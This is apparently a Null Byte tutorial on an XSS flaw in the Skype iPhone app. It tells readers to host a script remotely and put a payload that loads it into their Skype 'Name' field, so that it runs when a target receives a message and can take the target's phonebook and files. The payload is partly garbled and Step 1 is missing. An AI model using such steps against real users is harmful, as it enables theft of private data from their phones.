Easy Skype iPhone Exploit Exposes Your Phone Book & More

Like the recent XSS 0day exploit found in the Mac and Windows versions of Skype, a similar one has been found in the Skype app for iPhone. The vulnerability allows an attacker to send a message that contains malicious JavaScript code in the "Name" parameter. This code can steal your phonebook, crash the app, and potentially do a lot worse. The URI scheme is improperly identified for the web-kit browser. Instead of going to a blank browser page, it defaults to "file://". The code could steal any file on your phone that Skype could access. We can all see why this disaster-of-a-0day would want to be avoided, right?

In this Null Byte, I'm going to show you how the exploit works, and what you can do to prevent it!

Warning

Only perform this on yourself, or users who give you their explicit permission.

Upload the file to a free webhost of your choice - I recommend T35 Hosting.

Step 2 Crafting Your XSS Message

Open Skype on your computer.

Open up your settings and edit your "Name" parameter.

Enter the following as the "Name" contents:

">yoursite.t35.com">

Select a target that is on Skype and send them a message.

When your target receives the message, Skype will execute the XSS attack, calling the commands contained inside your remote web page. Dangerous. Below, is that the test may look like.

Is There a Way to Protect Myself from This Attack?

The short answer is, no.

The only way an iPhone Skype user can protect themselves is to simply not use the app until this is patched. You could block everyone who is not on your contacts list, but you have to trust the friends you do have to not try this on you.

Skype claims that they will have this patched in the next release. From experience, I'm going to say that that it probably won't happen soon. The last exploit like this lead to days upon days of non-stop alert flooding to all of my Skype contacts. ;)